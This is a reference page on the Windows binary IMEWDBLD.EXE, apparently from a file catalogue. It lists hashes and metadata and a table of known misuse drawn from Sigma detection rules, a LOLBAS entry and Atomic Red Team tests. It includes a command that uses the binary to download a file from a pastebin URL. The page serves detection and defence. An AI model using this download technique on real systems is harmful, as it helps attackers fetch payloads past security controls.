IMEWDBLD.EXE

  • File Path: C:\windows\system32\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 8850DBB08A9158F8488E1D7DA2A62E6F
SHA1 3D37A1BE298A38F4AA0934EB85BB32257E7C2CF0
SHA256 69D9BE75C7F403B13D7D3344E5BD8244DE16CB2877D95C0715591419AED71FA4
SHA384 68348EF39F951A1EC61B2180E5FF46A9E84168DA6874405FB3D8D0A20918A3C5252B551B38EE87A138D65142C078B7A3
SHA512 2C7D5B780B481C307589B2CF77642BB72CF416DEB0BAF84D400FC1EF40EAC28C71955E3F1607E7114E94B3FF6785D1BB31045D12B9A1B6EC715D8877C49AB039
SSDEEP 12288:B6uUP+1T+Qp5C0M0hdX+SXCoeVK90v+7Gs/r:0k1T+Q/i0hDSHNrs/

Signature

  • Status: The file C:\windows\system32\IME\SHARED\IMEWDBLD.EXE is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft IME 2012
  • Company Name: Microsoft Corporation
  • File Version: 15.0.9600.18514
  • Product Version: 15.0.9600.18514
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.